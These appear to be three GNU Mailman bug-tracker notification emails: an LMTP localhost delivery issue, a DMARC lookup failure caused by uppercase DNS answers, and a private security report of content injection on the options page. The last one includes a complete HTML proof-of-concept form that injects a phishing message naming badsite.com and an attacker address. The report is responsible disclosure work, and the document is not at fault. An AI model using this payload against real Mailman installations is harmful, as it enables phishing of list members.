Public bug reported:
Setting localhost in postfix_lmtp works against Postfix defaults and
breaks delivery.
Reason: The Postfix lmtp client only uses dns queries by default to
search for hostnames. If the DNS server does not provide an answer for
"localhost" delivery from the lmtp client to mailman fails.
Solution: Provide "127.0.0.1" instead of "localhost". This does not
require DNS and is even faster because it saves DNS lookups.
Example:
hey2(a)mailman.state-of-mind.de
lmtp:[localhost.localdomain]:8024
** Affects: mailman
Importance: Undecided
Status: New
** Tags: 3.0 mailman
--
setting localhost in postfix_lmtp breaks delivery
https://bugs.launchpad.net/bugs/544477
You received this bug notification because you are a member of Mailman
Coders, which is subscribed to GNU Mailman.
Public bug reported:
Using Mailman 2.1.33. I noticed that occasionally, DMARC mitigations for
aol.com "From" addresses were not being applied.
I tracked us down to the fact that DNS records can in rare cases return
"AOL" in uppercase in the answer of the TXT record lookup. Here's an
example where I caught it happening:
$ dig _dmarc.aol.com TXT
[...]
;; QUESTION SECTION:
;_dmarc.aol.com. IN TXT
;; ANSWER SECTION:
_dmarc.AOL.com. 492 IN TXT "v=DMARC1; p=reject; pct=100; rua=mailto:d@rua.agari.com; ruf=mailto:d@ruf.agari.com;"
Note that we requested "_dmarc.aol.com" in the question section, but got back "_dmarc.AOL.com" in the answer section. That case mismatch makes this code in Mailman/Utils.py skip the record:
for name in want_names:
if name not in results_by_name:
continue
I believe the solution is to lowercase the result after the lookup.
Patch attached.
** Affects: mailman
Importance: Undecided
Status: New
** Tags: dmarc
** Patch added: "Lowercase DMARC TXT record label in answer section"
https://bugs.launchpad.net/bugs/1881035/+attachment/5377571/+files/mailman-…
--
You received this bug notification because you are a member of Mailman
Coders, which is subscribed to GNU Mailman.
https://bugs.launchpad.net/bugs/1881035
Title:
DMARC mitigation fails if TXT record name contains uppercase
To manage notifications about this bug go to:
https://bugs.launchpad.net/mailman/+bug/1881035/+subscriptions
*** This bug is a security vulnerability ***
Private security bug reported:
An issue similar to CVE - https://www.cvedetails.com/cve/CVE-2018-13796/
exists at different endpoint & param. It can lead to a phishing attack.
Steps To Reproduce:
1. Copy and save the following HTML code and open it in any browser.
Code:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://example.com/mailman/options/mailman" method="POST">
<input type="hidden" name="email" value="Your account has been hacked. Kindly go to https://badsite.com or share your credentials at attacker@badsite.com" />
<input type="hidden" name="UserOptions" value="Unsubscribe or edit options" />
<input type="hidden" name="language" value="en" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
2. Can be seen there- "Your account has been hacked. Kindly go to
https://badsite.com or share your credentials at attacker(a)badsite.com"
message will be displayed on the screen.
** Affects: mailman
Importance: Medium
Assignee: Mark Sapiro (msapiro)
Status: Confirmed
--
You received this bug notification because you are a member of Mailman
Coders, which is subscribed to GNU Mailman.
https://bugs.launchpad.net/bugs/1873722
Title:
Arbitrary Content Injection via the options login page.
To manage notifications about this bug go to:
https://bugs.launchpad.net/mailman/+bug/1873722/+subscriptions